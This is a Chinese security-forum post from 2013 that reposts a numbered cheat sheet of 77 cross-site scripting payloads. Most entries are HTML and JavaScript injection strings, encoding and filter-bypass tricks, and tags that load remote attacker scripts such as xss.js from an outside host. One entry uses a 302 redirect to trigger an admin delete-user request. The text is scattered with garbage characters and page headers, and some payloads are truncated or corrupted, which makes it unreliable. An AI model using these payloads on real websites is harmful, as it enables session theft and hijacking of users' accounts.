貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。& | }. N9 r+ Z l
(1)普通的XSS JavaScript注入
; K& \ g9 ?: l/ M* b: F1 p; @<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& B2 b6 e, g+ D6 v' o(2)IMG标签XSS使用JavaScript命令
* W; x* A: j5 y, b. q" {! J1 E. a7 t<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 e' T7 Y- ?) C& e, ~$ P
(3)IMG标签无分号无引号
2 [$ g) t" H( Y% w4 _* P<IMG SRC=javascript:alert(‘XSS’)>9 J4 K# |2 J" c+ Q' P3 Z
(4)IMG标签大小写不敏感
2 t+ E8 O3 [2 O# f<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* \2 u5 l6 F0 B0 }$ z" x; ~(5)HTML编码(必须有分号)9 i% d$ K* ^7 R0 H9 `5 H
<IMG SRC=javascript:alert(“XSS”)>* Y0 G; G* x& z
(6)修正缺陷IMG标签
; B+ S1 `4 b2 ~: A& d<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* L0 n0 N( o7 y. F
; o) I6 {; P! q* _( [3 s, ?2 c
) L! m% n5 m% p6 w q(7)formCharCode标签(计算器)
. ~) Z! w: k) T$ ]0 g% D<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 o1 o" f7 W* f0 i, N3 w(8)UTF-8的Unicode编码(计算器)
0 D* H3 `- q! l& [! u<IMG SRC=jav..省略..S')>
7 {- s. j! O* Y; e(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ G( u+ c1 v! D& H) K; v
<IMG SRC=jav..省略..S')># D0 K9 g5 M+ c5 F
(10)十六进制编码也是没有分号(计算器)3 s0 `) O+ P3 s% ^8 n9 m
<IMG SRC=java..省略..XSS')>/ b- u; E1 G7 }/ N& R9 G
(11)嵌入式标签,将Javascript分开
* x) R1 B! ~* B% [<IMG SRC=”jav ascript:alert(‘XSS’);”>
- z. h7 x2 ?/ V) u; y(12)嵌入式编码标签,将Javascript分开
" T/ x5 H8 k. L6 Z& P' M1 H: q- V<IMG SRC=”jav ascript:alert(‘XSS’);”>
! M4 I1 g+ Y! _0 z/ p5 N" g$ [9 C(13)嵌入式换行符
0 v1 {4 p* t" U- Y+ W# |4 | d<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 P# a6 Y! r/ U% b# W' H(14)嵌入式回车; o$ ]3 ?3 o: J8 K, [; f
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ |8 c" ~6 |# N0 a: Z* ?& t9 Y
(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 d) o% e# l \" B; r
<IMG SRC=”javascript:alert(‘XSS‘)”>
1 A1 G2 v" D! {$ |: }1 c(16)解决限制字符(要求同页面)
$ ]; R8 Z. @1 t( X<script>z=’document.’</script>- K6 z0 ^6 b( V
<script>z=z+’write(“‘</script>3 j( C2 u0 V/ D# d; ~
<script>z=z+’<script’</script>5 n+ [' M+ o+ L! ~
<script>z=z+’ src=ht’</script>% c6 {9 ?4 f6 Z1 I8 C; [) \' c% } Z
<script>z=z+’tp://ww’</script>8 X$ S3 y2 R+ w( @8 ]% m1 Q) O( {
<script>z=z+’w.shell’</script>& L. i" J3 @$ g `" m
<script>z=z+’.net/1.’</script>9 q+ c: e+ r& k& E
<script>z=z+’js></sc’</script>! W/ T) l$ u3 ]- j- q0 J+ K1 A
<script>z=z+’ript>”)’</script>/ J; T$ i4 X A/ h) u) n
<script>eval_r(z)</script>
" h' r- b, Q0 V2 V& @% y9 |% h0 [& f5 B(17)空字符12-7-1 T00LS - Powered by Discuz! Board. ^8 Q- Y; s [( d( O, p
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
4 I4 P- g* k5 G2 Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out3 K J: b5 }9 m2 U- y3 ]5 m
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, y ^/ D! O- G( E0 M6 N' E6 X! @$ }
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 r1 \! @6 J5 k9 E6 m(19)Spaces和meta前的IMG标签& o! Z+ n" T% A- m0 K/ q6 d% X
<IMG SRC=” javascript:alert(‘XSS’);”>& \8 p4 b0 W% W1 L& c
(20)Non-alpha-non-digit XSS
9 V0 A7 |6 S7 b* ^) G8 K" f<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' A$ ]- o: |# L7 {
(21)Non-alpha-non-digit XSS to 2# F0 T$ U! {9 }) T% J
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% V% l* r* J" { c
(22)Non-alpha-non-digit XSS to 3
) @2 n% e/ u6 X" m<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* b( S- m9 k9 K( y% Q3 V( r
(23)双开括号
2 V5 |4 ?$ b2 ^5 [<<SCRIPT>alert(“XSS”);//<</SCRIPT>6 Q; p6 E& q- L8 W
(24)无结束脚本标记(仅火狐等浏览器)5 q+ N" v/ A- H0 E2 R
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 u6 G# _9 F% i6 |% @& Z% \
(25)无结束脚本标记2
9 i; f5 Q% u. \) V<SCRIPT SRC=//3w.org/XSS/xss.js>
" h! @; O5 ~# s4 N(26)半开的HTML/JavaScript XSS
- d# a3 g; N: T7 R1 W( \2 \% q<IMG SRC=”javascript:alert(‘XSS’)”* V3 p" }- J* W) r" `
(27)双开角括号
& H: ]* x& o; W3 ]3 M<iframe src=http://3w.org/XSS.html <0 L7 K2 H% F; z$ }0 s
(28)无单引号 双引号 分号
; c& W' n3 T# A4 V' P<SCRIPT>a=/XSS/: X0 w$ b4 N0 x4 F/ k
alert(a.source)</SCRIPT>. D( y; U0 A- ^ F
(29)换码过滤的JavaScript
" I- a) P. Y% a: P9 v, C9 B\”;alert(‘XSS’);//
& p& y5 a9 ~: Z4 w(30)结束Title标签+ Z, {) }4 I0 Q: @9 l: q* _ B9 ?
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 s, } G5 f3 K* i" }6 @% T U6 m
(31)Input Image! ^% A; e0 V' B# o# f
<INPUT SRC=”javascript:alert(‘XSS’);”>
5 h. k: \/ P# V) ]/ R6 C* E* {: V4 }(32)BODY Image
@* J: i# v% k3 H. ~1 R8 q3 v<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, @# r/ w0 h: `, h2 r# n
(33)BODY标签" u9 y7 F+ I& l* S; H# Y) i8 D
<BODY(‘XSS’)>
* n" w+ D4 s& d* M(34)IMG Dynsrc6 Q/ O' U! v3 V$ c; s
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! V2 w; J% J! j# p% s* u(35)IMG Lowsrc
4 h E: s7 {$ D6 o<IMG LOWSRC=”javascript:alert(‘XSS’)”>
( `1 Y5 W( E- h) k( u(36)BGSOUND$ A- w: C! N% v6 J @6 \+ @
<BGSOUND SRC=”javascript:alert(‘XSS’);”>, e3 a7 ^. I* g
(37)STYLE sheet
5 J0 H# p( W, T% e U3 D$ q<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! T* V y- g5 H7 N(38)远程样式表
- y( p4 I9 L- p' }- A3 u<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 b- c: U- x m2 A/ ?4 X+ y' F2 s% ]
(39)List-style-image(列表式)
8 f8 r2 l! W* o( ~9 |+ Q" I<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: ~4 c! S. C+ t
(40)IMG VBscript
# Z9 d9 m, r$ _<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 o. @/ b0 H6 W2 D9 S5 t7 B(41)META链接url
1 a2 H9 N1 |# f# B+ |# \! O; z0 C
9 V: D/ Q1 F) N- y4 s" W4 m. ^/ n$ k" x3 t) @6 f/ U& m4 H
<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ m7 e* |& S& h% J# d; {URL=http://;URL=javascript:alert(‘XSS’);”>
" b9 b& \9 M q) q+ M% _+ o( N& u& @(42)Iframe
* G1 o4 u( Q: d3 { q& \<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 r2 C# |: W/ A7 q) X) p
(43)Frame# R: o6 R! s' Y x4 b9 {/ B
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
2 ~( v& m& {# z6 p* u8 A# A5 j2 bhttps://www.t00ls.net/viewthread ... table&tid=15267 3/63 I* e+ s& t1 ^' y; L( Q
(44)Table
. b8 }) Q" `6 t. v% F. D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ L, J- I/ D7 W( v(45)TD
: f/ F: Y, u" W2 f0 ^( q+ Y1 H+ w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 r: e- h$ A5 F" n) Z |# O0 p4 G(46)DIV background-image
! ?3 c, @- [0 `* T<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; p7 o w3 r; {# R7 d7 G; l7 o- y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-0 @! R* U' B) I' ?! q6 J# H- R
8&13&12288&65279)
( {/ c2 v/ H g. b! f) r<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> P& p! @' E4 n
(48)DIV expression
" \$ G {$ Y: l<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( G0 D% U3 i. w: j3 Z; r3 V
(49)STYLE属性分拆表达) C b. I1 [4 u4 c" b
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 V3 Y" @3 s B. k* P" l# x(50)匿名STYLE(组成:开角号和一个字母开头)
) p1 V7 \( P" |. v N4 u; J5 L<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: X# x, a* w. }; z+ b3 F% F(51)STYLE background-image
/ |3 M+ H5 Y; q% e! r<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A1 k& h/ R6 e; }6 F! ~5 \1 Z
CLASS=XSS></A>9 i7 q% h) y9 `( t, N; t6 R
(52)IMG STYLE方式
2 t+ C, U# r: i: e7 D0 Qexppression(alert(“XSS”))’>3 a% N, J2 ^3 d
(53)STYLE background/ q; Y& m) M% I; t
<STYLE><STYLE
6 s; G. W) ^2 r- p$ Y# ^type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% |1 Y" j" E* O$ ^(54)BASE
' g+ N; {3 s2 S- C, P, b+ a3 V<BASE HREF=”javascript:alert(‘XSS’);//”>, j9 N6 ^; ^1 U) m
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 J) ?5 @, M' ?& W; U
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 J% j- `' `5 B* D7 f* W! C4 W
(56)在flash中使用ActionScrpt可以混进你XSS的代码
5 a, a+ J1 D4 L& n) M ]$ da=”get”;
) }2 J% z) Y( Y: l9 u7 Wb=”URL(\”";
" h. H1 [' A( ?c=”javascript:”;
7 A& G$ T. f( ?1 @9 xd=”alert(‘XSS’);\”)”;
/ Q I: u' p$ f8 b" l- M5 d: `' z" beval_r(a+b+c+d);
$ B9 b1 F8 p; h# F(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
J: G5 b! D1 ^7 F! O8 Z9 h4 F- j<HTML xmlns:xss>3 L! L2 u8 X8 y$ h' @
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( q: W& m7 B4 P5 p' J
<xss:xss>XSS</xss:xss>2 U! [ I/ p0 Z/ i& J0 Q0 M% I* x! V
</HTML>- B+ c: {- r: d$ B( u1 n
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. @6 |. K' m" ?( m( b' ]$ g: }<SCRIPT SRC=””></SCRIPT>, h6 {0 ]2 P0 c/ c% ?: `
(59)IMG嵌入式命令,可执行任意命令3 _9 r. S& v; w- D" t) m
<IMG SRC=”http://www.XXX.com/a.php?a=b”>% B: }; \$ e/ t5 U0 }
(60)IMG嵌入式命令(a.jpg在同服务器)
2 P+ h' f4 l9 @( u9 u! s DRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 L4 @& d. M0 G+ }4 S# W
(61)绕符号过滤' M4 r/ j% w2 N' X9 G9 c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% {2 L0 B7 o6 Y# S' }! y0 u$ e(62)
6 j: L. Q& K5 ?0 [7 J6 e% G# x. F<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* T" I, M9 k% G: `' i) p(63)
: o! R$ P( q" m- ?<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
_! M8 s9 f% b" m(64)
! n( {) N' ~% R+ C<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% L8 t( c- a/ b R. B% j( i; S4 K7 a(65)
! ]. @( w6 Y0 }3 a, T0 |<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>+ v+ n: a/ {9 D
(66)12-7-1 T00LS - Powered by Discuz! Board
3 R. G& j9 Q7 K9 p% H8 T& Shttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
# [0 t- T: K& }8 u- u<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>1 v$ w. Y' S4 a9 f
(67)6 _ C; E! U5 c C5 {, t8 {& e* M
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>) |3 i+ F6 `8 g, |. n
</SCRIPT>* s+ [+ f& ~) O7 f% Y
(68)URL绕行0 J+ u% B6 T. S/ j4 i
<A HREF=”http://127.0.0.1/”>XSS</A>
6 ^% x$ ^4 j8 T" _(69)URL编码
! c/ M# f" i# F- |<A HREF=”http://3w.org”>XSS</A>- I9 j2 d( S' D; |" j1 x) n
(70)IP十进制1 u6 w5 u* o" b4 u4 |
<A HREF=”http://3232235521″>XSS</A>
) c5 {7 c+ i" X7 P6 J0 M' p/ J3 M(71)IP十六进制
/ {, R3 y8 w% ^, e3 e' @6 I<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 l3 G3 f: v/ W: ~(72)IP八进制
# d, K9 o# e8 I8 g' k<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 x& o$ ^: D, K
(73)混合编码" d- N0 J; D/ C1 ~5 e! t& m9 N8 w
<A HREF=”h% c. M6 k/ D# O5 |) w& \ L
tt p://6 6.000146.0×7.147/”">XSS</A>
. P9 F* S' L' D+ v" @" v1 n# x(74)节省[http:] v, F/ f2 t* Z1 ~+ u
<A HREF=”//www.google.com/”>XSS</A>
1 Y, z# V; c. R* a0 C) J(75)节省[www]
5 e2 p( M6 W* p' n<A HREF=”http://google.com/”>XSS</A>
* V$ {1 F9 l: R+ s5 H a4 W(76)绝对点绝对DNS. `. e& s' w5 I# e5 o6 K
<A HREF=”http://www.google.com./”>XSS</A>
/ b2 M5 z# E( {, z, Y(77)javascript链接
" g; e& k8 r* S8 H<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
2 L' e: u7 u# J0 N; n5 B: K9 g2 ?+ [' L0 m
原文地址:http://fuzzexp.org/u/0day/?p=14/ j {. v5 k; c5 t+ S
7 ^' S0 D2 [- d' \9 K |
发表于 2013-4-19 19:22:37
收藏
支持
反对